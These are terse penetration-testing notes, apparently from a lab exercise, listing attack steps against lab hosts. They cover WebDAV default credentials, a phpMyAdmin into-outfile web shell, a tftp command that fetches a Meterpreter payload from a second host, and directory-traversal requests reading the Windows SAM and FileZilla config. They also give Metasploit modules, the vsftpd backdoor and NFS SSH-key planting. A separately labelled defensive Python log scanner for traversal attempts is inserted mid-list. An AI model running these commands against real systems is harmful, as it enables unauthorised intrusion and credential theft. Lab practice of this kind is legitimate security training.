(1) Webdav Default Credentials
Default -> wampp:xampp
a. cadaver http://192.168.0.190/webdav
b. Use Msfvenom to create a PHP shell and upload
c. Use msfconsole to exploit
(2) Open phpMyAdmin
a. Create a php shell on the Apache server using a SQL query
SELECT "" into outfile "C:\\xampp\\htdocs\\shell.php"
http://192.168.0.190/shell.php?cmd=ipconfig
b. Add a meterpreter PHP file
http://192.168.0.190/shell.php?cmd=tftp 172.16.85.131 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php
(3) Zervit 0.4 directory traversal
nc 192.168.20.10 3232
GET /../../../../../boot.ini HTTP/1.1
http://192.168.0.190:3232/index.html?../../../../../../xampp/FileZillaFtp/FileZilla%20Server.xml
http://192.168.0.190:3232/index.html?../../../../../../WINDOWS/repair/sam
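A defender-side check for the traversal requests listed above, added here as an example and not part of the original notes: it scans constructed Apache-style log lines (IPs and timestamps are made up), percent-decodes repeatedly so double-encoded hops are caught, normalises backslashes, and flags any request whose path or query carries a ".." segment, including the Zervit-style "index.html?../../" form.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format); not captured from a real host.
SAMPLE_LOG = """\
192.168.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 512
192.168.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.html?../../../../../../xampp/FileZillaFtp/FileZilla%20Server.xml HTTP/1.1" 200 2048
192.168.0.5 - - [10/Oct/2023:13:55:41 +0000] "GET /index.html?..%2f..%2f..%2fWINDOWS/repair/sam HTTP/1.1" 200 1024
192.168.0.5 - - [10/Oct/2023:13:55:42 +0000] "GET /%2e%2e/%2e%2e/boot.ini HTTP/1.1" 404 0
192.168.0.5 - - [10/Oct/2023:13:55:43 +0000] "GET /docs/..%255c..%255cwindows/win.ini HTTP/1.1" 404 0
192.168.0.5 - - [10/Oct/2023:13:55:44 +0000] "GET /images/logo..png HTTP/1.1" 200 300
"""

# Pulls method and request-target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(s, max_rounds=3):
    """Percent-decode repeatedly so %252e%252e (double-encoded '..') is caught."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def is_traversal(target):
    """True if the decoded path or query contains a parent-directory ('..') segment."""
    decoded = decode_fully(target).replace("\\", "/")
    # Split on path and query delimiters and test each piece on its own,
    # so a filename like 'logo..png' is not a hit while a bare '..' is.
    return any(part == ".." for part in re.split(r"[/?&=]", decoded))


def find_traversal_attempts(log_text):
    """Return (client_ip, raw_request_target) for each request that attempts traversal."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_traversal(m.group("target")):
            hits.append((line.split()[0], m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, target in find_traversal_attempts(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {target}")
```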
(4) Exploiting a Buffer Overflow
Buffer overflow in SLMail
windows/pop3/seattlelab_pass
(5) Exploiting a Web Application
Unsanitized parameter in graph_formula.php -> PHP code execution
unix/webapp/tikiwiki_graph_formula_exec
(6) Piggybacking on a Compromised Service
VsFTP -> backdoored
Username ending in a :) spawned a backdoor on port 6200
(7) Exploiting Open NFS Shares
NFS on port 2049
showmount -e 172.16.85.136
ssh-keygen
mkdir /tmp/r00t/
mount -t nfs -o nolock 172.16.85.136:/export/username/ /tmp/r00t/
cat ~/.ssh/id_rsa.pub >> /tmp/r00t/.ssh/authorized_keys
umount /tmp/r00t/